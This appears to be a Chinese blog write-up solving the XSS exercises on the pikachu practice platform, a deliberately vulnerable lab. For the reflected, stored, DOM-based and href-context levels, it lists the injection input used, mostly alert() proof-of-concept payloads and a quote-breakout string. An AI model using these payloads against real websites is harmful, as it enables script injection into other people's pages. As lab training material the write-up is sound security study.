第一题:反射性xss(get)

pikachu靶机练习平台-xss

 

 pikachu靶机练习平台-xss

 

 

输出的字符出现在url中

第二题:反射性xss(post)

登录后输入<script>alert(1)</script>pikachu靶机练习平台-xss

 

 

第三题:存储型xss

输入<img src=http://1.html onerror=alert(1)>

pikachu靶机练习平台-xss

 

 

第四,五题:domxss:

输入:'><img src="#" onmouseover="alert('xss')">
pikachu靶机练习平台-xss

 

 pikachu靶机练习平台-xss

 

 pikachu靶机练习平台-xss

 

 

第七题:

输入:<img src=0+onerror="alert(123)">

pikachu靶机练习平台-xss

 

 

第八题:xss之htmlspecialchars
审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中

pikachu靶机练习平台-xss

输入:javascript:alert(1)

pikachu靶机练习平台-xss

 

 

第九题:xss之href输出

pikachu靶机练习平台-xss

 

 

第十题:

输入:';alert(1)//

pikachu靶机练习平台-xss

 

 pikachu靶机练习平台-xss

 

 

 

 

相关文章:

  • 2021-10-01
  • 2021-09-08
  • 2021-11-08
  • 2022-01-05
  • 2022-01-14
  • 2021-02-05
  • 2021-11-11
  • 2021-11-14
猜你喜欢
  • 2021-11-03
  • 2021-06-26
  • 2020-03-30
  • 2021-12-27
  • 2021-10-19
  • 2021-11-08
  • 2021-09-29
  • 2020-11-06
相关资源
相似解决方案